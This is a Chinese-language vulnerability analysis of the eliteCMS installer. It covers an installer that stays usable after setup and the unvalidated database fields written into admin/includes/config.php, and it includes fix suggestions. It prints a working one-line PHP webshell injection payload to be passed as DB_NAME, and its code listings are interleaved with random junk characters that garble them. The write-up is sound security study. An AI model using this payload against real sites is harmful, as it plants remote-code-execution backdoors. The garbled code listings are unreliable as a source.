eliteCMS 的安装程序在安装结束后未作锁定，导致黑客可以通过访问安装程序地址进行重复安装。（修复思路：安装完成后写入锁定文件，安装程序入口处检测到该文件即拒绝继续执行。）
另外一个漏洞是：安装程序可以把一句话后门直接写入 admin/includes/config.php。
我们来看代码：
+ L- o9 i9 j! Q
- ^9 y. _6 v8 B5 G$ R P$ j...
# v0 {% b# j& D7 U& \9 oelseif ($_GET['step'] == "4") {
. T# x% z9 h4 T, Z $file = "../admin/includes/config.php";; q" M* C c+ @, \; I. h
$write = "<?php\n";* l( Z/ z h0 ^9 V% N- R6 [9 [
$write .= "/**\n";) x8 h3 d) b6 |/ v% C$ K3 ?/ Y
$write .= "*\n";) w& F; S) y1 B
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";: \. ?" F, \+ `5 }! k, T
...略..., T7 ?" `6 r6 ~) A6 x! }% S
$write .= "*\n";/ I) h# Q& d2 `. |& V
$write .= "*/\n";
- y% I( n- M1 U8 t6 ?# V5 A $write .= "\n";
% _1 i* o5 \9 W3 r2 T# n $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
) d# p# }! p# h; r $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";; M- R$ o9 v- q$ n8 V2 a+ B
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";8 F8 F! h) ^. D* `% _) w
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
$ v' L" P( B. y1 r% {: C0 F2 s $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
2 i) G i9 H8 n0 T8 R1 l+ A $write .= "if (!\$connection) {\n";2 c# t( D8 E- }6 A1 x
$write .= " die(\"Database connection failed\" .mysql_error());\n";
5 n i0 |! _' p7 p $write .= " \n";2 I" i$ N- K6 Z$ s8 e/ d
$write .= "} \n";
4 v6 b7 T& n; J6 Z, i6 @! G $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";: Q& O7 u% \7 q: x& I) _# Z6 C# q" f
$write .= "if (!\$db_select) {\n";9 M7 O% }" @, J; W' G9 m) l; E
$write .= " die(\"Database select failed\" .mysql_error());\n";3 y4 K1 Y. B9 s" m( j( L( }9 B9 s$ u
$write .= " \n";- O& s, l' v. Y9 j6 S
$write .= "} \n";
0 ]- \) c. \/ r% ?4 I% Q9 b3 n $write .= "?>\n";
4 ~! R% M. z8 j: `3 H* S
2 Q0 v" _: F8 ~' L- U4 A $writer = fopen($file, 'w');' J& J c) \4 E U( s
...! l/ r" V( Q4 i6 i/ d7 C* T
( H( {: f$ _4 a" r5 M* ?! n4 o
再看代码：
" D2 O7 w0 T2 y, P" C7 J- L t$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
g' s6 y8 q) U0 [5 l( D0 p0 P+ [8 @$_SESSION['DB_NAME'] = $_POST['DB_NAME'];5 a4 z( U+ ^5 c$ c2 P- Y
$_SESSION['DB_USER'] = $_POST['DB_USER'];+ u& X3 `) @: H3 e$ L6 v
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];) |3 c% a$ N) g K$ g& S! Y
取值未作任何验证，就直接拼接进了生成的 PHP 配置文件。（修复时应在写入前校验这些值，或用 var_export() 生成字面量，避免输入中的双引号把字符串截断。）
如果把数据库名（DB_NAME）的 POST 数据设为：
/ E0 K, C: U. \3 H) ^0 v- f"?><?php eval($_POST[c]);?><?php
* ~% {" j, G: L$ d2 A9 L 3 k, S9 q( k! u9 O8 p8 g
就会导致一句话后门被写入 /admin/includes/config.php。
1 V5 O* s- @7 E/ b. Q! d, z |